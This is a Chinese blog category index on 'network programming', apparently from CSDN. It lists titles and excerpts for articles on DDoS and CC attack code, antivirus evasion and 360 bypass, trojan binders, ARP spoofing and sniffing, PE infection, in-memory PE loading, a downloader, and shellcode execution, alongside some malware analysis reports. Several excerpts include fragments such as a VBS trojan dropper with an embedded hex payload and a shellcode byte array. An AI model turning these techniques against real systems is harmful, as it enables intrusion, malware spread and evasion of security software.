网络编程
文章平均质量分 87
学习网络协议,网络模型,编程技巧
H-KING
学海无涯
展开
-
暴力破解百度云
// CrackBaidu.cpp : 定义控制台应用程序的入口点。//#include "stdafx.h"#include #include #pragma comment(lib,"WS2_32")#pragma warning(disable:4996)class LMemTest{public: LMemTest(void){}; ~LMemTest(voi原创 2015-10-07 21:00:15 · 3268 阅读 · 0 评论 -
一个感染型的病毒逆向分析
作者:Fly2015其实对于病毒分析人员来讲,会逆向分析汇编代码只是一个方面,一名出色的病毒分析人员不但要会分析汇编代码还要会总结病毒的行为。因为病毒分析报告是给看不懂这些汇编代码人员看的。一份好的病毒分析报告要让人看了报告之后,能大致了解这个病毒有哪些危害,怎么去预防和基本的判断是这种病毒。如果是为了写病毒专杀而做的分析报告那就另当别论了。对于代码的具体分析:转载 2017-10-25 09:38:11 · 1795 阅读 · 1 评论 -
一个DDOS病毒的分析(一)
一、基本信息样本名称:Rub.EXE样本大小:21504 字节病毒名称:Trojan.Win32.Rootkit.hv加壳情况:UPX(3.07)样本MD5:035C1ADA4BACE78DD104CB0E1D184043样本SHA1: BAD1CE555443FC43484E0FACF8B88EA8756F78CB 病毒文件的组成:转载 2017-10-24 17:12:01 · 758 阅读 · 0 评论 -
DDoS攻击原理及防护方法论
从07年的爱沙尼亚DDoS信息战,到今年广西南宁30个网吧遭受到DDoS勒索,再到新浪网遭受DDoS攻击无法提供对外服务500多分钟。DDoS愈演愈烈,攻击事件明显增多,攻击流量也明显增大,形势十分严峻,超过1G的攻击流量频频出现,CNCERT/CC掌握的数据表明,最高时达到了12G,这样流量,甚至连专业的机房都无法抵挡。更为严峻的是:利用DDoS攻击手段敲诈勒索已经形成了一条完整的产业链!并且,转载 2015-09-27 16:31:26 · 516 阅读 · 0 评论 -
NC源码编译及免杀
NC反弹工具,相信大家也不陌生了吧,这里就就介绍怎么编译它,两种方式:第一种:vc makefile文件编译1、进入vc安装目录 执行vcvars32.bat(设置环境用的,只需要执行一次)D:\Program Files\Microsoft Visual Studio\VC98\Bin>VCVARS32.BAT2、进入项目目录,运行makefileE:\TeamProgr转载 2015-08-08 21:33:49 · 3328 阅读 · 0 评论 -
交换机网络嗅探方法之用ARP欺骗辅助嗅探
来源:本站转载 作者:佚名时间:2013-09-09TAG: 我要投稿嗅探在集线器盛行的年代可简单实现你什么事情都不用干,集线器自动会把别人的数据包往你机器上发。但是那个年代已经过去了,现在交换机已经代替集线器成为组建局域网的重要设备,而交换机不会再把不属于你的包转发给你,你也不能再轻易地监听别人的信息了(不熟悉集线器和交换工作原理的朋友可以阅读文章《网络基础知识:集线器、网桥转载 2015-01-20 12:54:40 · 1118 阅读 · 0 评论 -
用C++实现的壳(基础版)
原文链接:https://bbs.pediy.com/thread-206804.htm最近一直在15PB学习,现阶段学的主要是关于壳的知识,正好现在也在做壳这个阶段项目,用了2天的时间实现了一个基础版的C++写的壳,拿出来跟大家分享一下,代码量不多,但知识点不少,适合新手学习提高~ 壳的流程看上去并不复杂,但需要的是你对PE文件有一定的了解,在了解了一些关于导入转载 2017-11-01 17:31:52 · 4262 阅读 · 1 评论 -
利用x64_dbg破解一个最简单的64位小程序
最近在研究学习一些逆向的东西,其实之前也涉及到这方面的东西,只是之前的系统和应用,基本上都是32位的,所以直接用od来分析就行了,这方面的资料在网上很多,随便一搜到处都是,不过随着技术的不断发展,64位系统出现了,随之64位的应用也出现了,而od只能分析32位应用,所以一些64位应用,od是没办法分析逆向的,所以,在这里要提到另一个可以用于分析64位应用的调试软件,名字叫x64_dbg。网上对于这转载 2017-10-12 14:18:19 · 19715 阅读 · 4 评论 -
快速发包突破ARP防火墙思路
今天忽然想写个关于破Arp 防火墙的文章,也是老生常谈了,真理只有一条:知道原理,就能知道解决方案……Arp 也是个很老的通讯协议了,Arp 攻击也很老了,关于Arp 欺骗原理,我写过很多了,这里不再累赘了这里只是简单的谈一谈“金山贝壳Arp 防火墙v2.0”的防御原理(其他各类Arp 防火墙基本一样,这里就拿金山贝壳举例),以及突破方法。Arp 防火墙的防御方案:1、绑定本机Ar转载 2015-01-26 12:39:44 · 1526 阅读 · 0 评论 -
嗅探(被动嗅探)与ARP欺骗(主动嗅探)详解
关于嗅探与ARP欺骗的原理,网络上有很多很好的帖子和文章,但大部分都忽略了数据在网络中的转发过程。实际上用嗅探和ARP欺骗来做标题有点忽悠的成分,因为嗅探本身就包含了主动嗅探和被动嗅探,而ARP欺骗又是一个单独的技术,欺骗的目的只是让数据经过本机,即:主动嗅探=ARP欺骗+抓包。在了解嗅探和ARP欺骗原理之前,我们必须对数据包在各种(交换网络、共享网络等)网络环境中的传输过程,笔者在这边也只针对交转载 2015-01-21 12:08:49 · 3363 阅读 · 0 评论 -
Photo.scr病毒
Photo.scr病毒怎么清除和防范?有段时间笔者的win2003服务器上出现大量Photo.scr病毒,庆幸的是检查任务管理器后并没有发现可疑进程,说明病毒没有被执行。删除后没清静多少时间,这些病毒又冒出来了。这些Photo.scr的路径都在IIS自带FTP的路径下,关闭FTP服务就不再出现了,只要一开FTP过段时间又会出现。然后就认为黑客是利用了IIS自带的FTP漏洞上传的病毒文件,只要不用F转载 2018-01-18 11:26:37 · 7960 阅读 · 0 评论 -
VBS木马源码(virus.vbs.writebin.a)
先贴出来源代码:<SCRIPT Language=VBScript><!--DropFileName = "svchost.exe"WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000000000000000000...原创 2018-08-31 23:06:15 · 113103 阅读 · 2 评论 -
从内存中加载并运行exe(两种方法)
windows似乎只提供了一种启动进程的方法:即必须从一个可执行文件中加载并启动。 而下面这段代码就是提供一种可以直接从内存中启动一个exe的变通办法。 用途嘛, 也许可以用来保护你的exe,你可以对要保护的 exe 进行任意切分、加密、存储, 只要运行时能将exe的内容正确拼接到一块内存中,就可以直接从内存中启动,而不必不安全地去转载 2017-09-12 22:28:25 · 10397 阅读 · 0 评论 -
对现有的所能找到的DDOS代码(攻击模块)做出一次分析----其他(攻击方式)篇
//=================================================================================文章作者:alalmn—飞龙分析者:alalmn—飞龙 BLOG:http://hi.baidu.com/alalmn分析的不好请各位高手见谅花了几个小时分析的呵呵没发现什么新鲜的东西还是以发送垃圾转载 2015-09-27 17:00:46 · 1460 阅读 · 0 评论 -
将可执行文件以资源的方式加入到另一个可执行文件并释放
添加资源非常简单,这里贴出释放代码//创建文件bool CttDlg::CreateMyFile(CString strFilePath,LPBYTE lpBuffer,DWORD dwSize){ HANDLE hFile = CreateFile(strFilePath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL); if (hF转载 2015-08-14 23:14:41 · 514 阅读 · 0 评论 -
Raw Socket编程
Windows2000在TCP/IP协议组件上做了很多改进,功能也有增强。比如在协议栈上的调整,增大了默认窗口大小,以及高延迟链接新算法。同时在安全性上,可应用IPSec加强安全性,比NT下有不少的改进。 Microsoft TCP/IP 组件包含“核心协议”、“服务”及两者之间的“接口”。传输驱动程序接口 (TDI) 与网络设备接口规范 (NDIS) 是公用的。此外,还有许多用户模转载 2015-03-15 22:24:35 · 1275 阅读 · 1 评论 -
局域网arpsniffer源码剖析
代码是别人写的,我重构了一下,加了点注释,亲测可用。arp.h#pragma once//netbios服务根据ip解析MAC是需要用的结构体typedef struct _ASTAT{ ADAPTER_STATUS adapt; NAME_BUFFER NameBuff[30]; } ASTAT, * PASTAT;//ip-mac对应表typedef s原创 2015-08-03 16:37:58 · 2294 阅读 · 0 评论 -
利用注册表隐藏文件
文件夹选项的操作对应的注册表的变化:[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced] "Hidden"=dword:00000002 "Hidden"=dword:00000001 "HideFileExt"=dword:00000001 "HideFileExt"=d转载 2015-08-08 10:19:40 · 1989 阅读 · 0 评论 -
CC攻击
CC源代码发布说明CC已经发布了一个多月了,按照承若,我早该发布源代码了,但是我自己一直没有想到有效的CC防御方法,所以也就没有发布,现在我想出了一个不错的方法,于是本着共享的精神,发布出来。说实话,CC的代码是我写的第一个VC程序,所以写得很不好,不断地混用CString和Char,反正还有很多缺陷啦,大家就不要骂我了。顺便在这里回答几个问题吧(FAQ)1. 为什么我使用CC没有转载 2015-09-27 16:44:09 · 1891 阅读 · 1 评论 -
Backdoor.Zegost木马病毒分析(一)
http://blog.csdn.net/qq1084283172/article/details/50413426一、样本信息样本名称:rt55.exe样本大小: 159288 字节文件类型:EXE文件病毒名称:Win32.Backdoor.Zegost样本MD5:C176AF21AECB30C2DF3B8B8D8AA27510转载 2017-10-25 09:40:42 · 5269 阅读 · 0 评论 -
小红伞和NOD32基于源码的免杀经验总结
小红伞和NOD32的杀毒引擎是非常厉害的,尤其是他们的启发式杀毒,简直快把病毒木马逼到了绝路。由于需要,这两天我和CG(一个高手)对一个远控软件进行了小红伞和NOD32的免杀。一开始很自然的拿出CCL对PE文件的病毒特征码进行定位,但是却定位到了导入表和PE文件头上(这两款杀毒软件的确太狠了)。没有办法,常规的修改指令的方法是行不通了。GOOGLE了一下,发现网上有利用重构导入表的方法来做小红伞和转载 2017-09-13 18:37:17 · 1534 阅读 · 0 评论 -
Web服务器面临的五种应用层DOS威胁
经测试发现,很多web站点无法抵御应用层的DOS攻击。可笑的是有些提供安全服务,安全研究的站点都没有抵御这类攻击的防范。今天把这些方法总结出来,希望Web管理员对自己的服务器进行一下健康体检。此文之前曾发表看雪论坛。 ok,经典的DOS有:ICMP flood ,SYN flood,UDP flood,Teardrop attacks ,Spoofing attacks。这里总结一下Web转载 2015-09-27 16:50:57 · 1895 阅读 · 0 评论 -
绕过360安全卫士的部分代码
利用快捷方式,由用户启动程序,进行绕过360父进程查杀,代码记录于此处,方便查阅[cpp] view plain copyint bypass_360_startup() { TCHAR str_desktop[256]; LPITEMIDLIST pidl; SHGetSpecia转载 2017-10-20 09:30:39 · 3871 阅读 · 2 评论 -
木马捆绑器设计思路和源码
木马捆绑是把一个有界面的正常程序,和一个后门程序捆绑在一起从而制作一个木马。木马捆绑器一般是三个程序和在一起,程序1:正常程序,程序2:后门程序,程序3:一个加载。这个加载器的作用就是包容、释放、加载这前面两个个程序,MZ*******************************************************************************原创 2015-10-10 21:00:36 · 4060 阅读 · 0 评论 -
支持64位系统的XOR加密后内存加载PE绕过杀毒软件
http://bbs.pediy.com/showthread.php?t=203910绝对自动支持32、64位的内存加载源码无聊逛看雪时,看到了这个。然后到github上找到了源。就是这里:https://github.com/fancycode/MemoryModule结合我几年前写的一个利用方法:https://github.com/eric21/MemPE使转载 2017-09-14 11:54:46 · 1167 阅读 · 0 评论 -
对现有的所能找到的DDOS代码(攻击模块)做出一次分析----SYN(洪水攻击)篇
对现有的所能找到的DDOS代码(攻击模块)做出一次分析----SYN(洪水攻击)篇//=================================================================================飞龙 BLOG:http://hi.baidu.com/alalmn分析的不好请各位高手见谅花了几个小时分析的呵呵SYN转载 2015-09-27 16:52:54 · 1184 阅读 · 0 评论 -
SSClone非ARP会话劫持原理分析
作者:robur来源:CSNA网络分析论坛前两天买的过期杂志上看到的一款软件,刚开始还没注意,后来就恨自己杂志买晚了。(今年3月份的《黑客防线》)那个神奇的软件,就像我标题上说的,叫SSClone,解释起来就是:Switch Session Clone,也就是“交换机会话克隆”(纯字面翻译,纯的~ )。这个软件有什么用?其特点就是可以不通过传统的ARP欺骗方法,来实现局域网内的转载 2015-01-15 19:39:02 · 823 阅读 · 0 评论 -
简单感染PE文件
这个感染方式和win9x时代的CIH病毒感染方式很像。。。@PandaOS这个程序的感染标识放在了DOS头中。。。因为DOS头只有MZ和最后一个指向PE头的指针很重要,改了就完蛋了。。。别的几乎用不到所以修改DOS头的话,只要不修改首尾字段,几乎不会影响程序的运行。源程序感染后的感染前程序的入口感染后程序的入口只要搜索节中的空隙,然后将代码分成几转载 2017-10-08 02:49:01 · 1267 阅读 · 0 评论 -
超小下载者源码
// DL.cpp : Defines the entry point for the application.//#include "stdafx.h"#include #pragma comment(lib,"urlmon.lib")int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE原创 2015-08-08 10:15:28 · 1245 阅读 · 0 评论 -
关于windows xp sp2/sp3 中tcpip.sys对于Raw socket的限制
WINDOWS XP SP2修改了TCPIP.SYS,增加了对于RAW SOCKET的发送和伪造源地的限制,详情如下 :1) 不能通过raw socket发送TCP报文。做此尝试时会得到10004号错误。2) 不能通过raw socket发送伪造源IP的UDP报文。3) 不能通过raw socket发送IP碎片。做此尝试时会得到10004号错误。不知微软在哪次对20转载 2015-08-23 22:13:22 · 1316 阅读 · 0 评论 -
Sniffer Pro 教程
一、前言 曾写过《用协议分析工具学习TCP/IP》一文,有幸受到一些人的关注,该文中用的工具是Iris,其实Sniffer Pro是非常优秀的协议分析软件,许多下载网站说它是最好的网络协议分析软件。做为一名合格的网管肯定需要有这么一套好的网络协议分析软件,它对分析网络故障等极为有用。 Sniffer Pro同时又是非常优秀的嗅探器,也就是说它可以捕捉到网络中其它机器的帐号和密码。本文介绍转载 2015-02-09 12:46:26 · 3245 阅读 · 2 评论 -
C语言执行shellcode的五种方法
#include "windows.h"#include "stdio.h" typedef void (_stdcall *CODE)();//一段打开Windows计算器(calc.exe)的shellcode unsigned char shellcode[] = "\xb8\x82\x0a\x8d\x38\xd9\xc6\xd9\x74\x24\xf4\x5a\x转载 2017-10-20 14:06:20 · 3679 阅读 · 0 评论 -
端口复用:隐藏 嗅探与攻击
前言在WINDOWS的SOCKET服务器应用的编程中,如下的语句或许比比都是:s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);saddr.sin_family = AF_INET;saddr.sin_addr.s_addr = htonl(INADDR_ANY);bind(s,(SOCKADDR *)&saddr,sizeof(saddr));转载 2015-01-21 17:27:22 · 1698 阅读 · 0 评论 -
一个DDOS木马后门病毒的分析
http://blog.csdn.net/qq1084283172/article/details/49305827一、样本信息文件名称:803c617e665ff7e0318386e24df63038文件大小:61KB病毒名称:DDoS/Nitol.A.1562MD5:803c617e665ff7e0318386e24df63038转载 2017-10-25 09:39:45 · 1582 阅读 · 0 评论 -
一个DDOS病毒的分析(二)
一、基本信息样本名称:hra33.dll或者lpk.dll样本大小: 66560 字节文件类型:Win32的dll文件病毒名称:Dropped:Generic.ServStart.A3D47B3E样本MD5:5B845C6FDB4903ED457B1447F4549CF0样本SHA1:42E93156DBEB527F6CC104372449D转载 2017-10-24 17:13:06 · 859 阅读 · 0 评论 -
终极会话劫持工具SSClone
文/图 刘志生 继httphijack以来,cncert又一巨作终于面世,它就是Switch Session Clone。SSClone是基于无MAC欺骗的会话复制软件,可完全无痕迹实现会话劫持,可过任何ARP防火墙,亦可工作于IP/MAC双向绑定的交换环境中。它是一款绿色软件,需要.net Framework2.0的运行环境,没有安装.net2.0的,请先安装.net环境,或转载 2015-01-15 12:51:35 · 2892 阅读 · 1 评论 -
对现有的所能找到的DDOS代码(攻击模块)做出一次分析----GET篇
//=================================================================================分析者:alalmn—飞龙 BLOG:http://hi.baidu.com/alalmn分析的不好请各位高手见谅花了几个小时分析的呵呵在这里不得不说 很多代码只写了界面 服务端没代码(把代码删除了) 要发就全转载 2015-09-27 16:55:41 · 932 阅读 · 0 评论 -
一个感染型木马病毒分析(二)
作者:龙飞雪0x1序言前面已经对感染型木马病毒resvr.exe的病毒行为进行了具体的分析见一个感染型木马病毒分析(一),但是觉得还不够,不把这个感染型木马病毒的行为的亮点进行分析一下就有点遗憾了。下面就针对该感染型木马病毒的感染性、木马性以及被感染文件的恢复几个方面进行具体的分析和说明,直观感受一下病毒的感染性、木马性质。 0x2病毒木马性转载 2017-10-24 17:07:34 · 893 阅读 · 0 评论 -
替换系统wsock32.dll,实现封包拦截
// wsock32.cpp : Defines the entry point for the DLL application.//::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: // Module : 替换系统wsock32.dll,实现转载 2015-05-07 13:02:04 · 3338 阅读 · 0 评论 -
十招教你学会软件破解(转)
下面谈到了一些在学习解密过程中经常遇到的问题,本人根据自己的经验简单给大家谈一谈。这些问题对于初学者来说常常是很需要搞明白的,根据我自己的学习经历,如果你直接照着很多破解教程去学习的话,多半都会把自己搞得满头的雾水,因为有很多的概念要么自己不是很清楚,要么根本就不知道是怎么一回事,所以希望通过下面的讨论给大家一定的帮助: 1. 断点:所谓断点就是程序被中断的地方,这个词对于解密者来说是转载 2016-05-30 11:44:19 · 4556 阅读 · 0 评论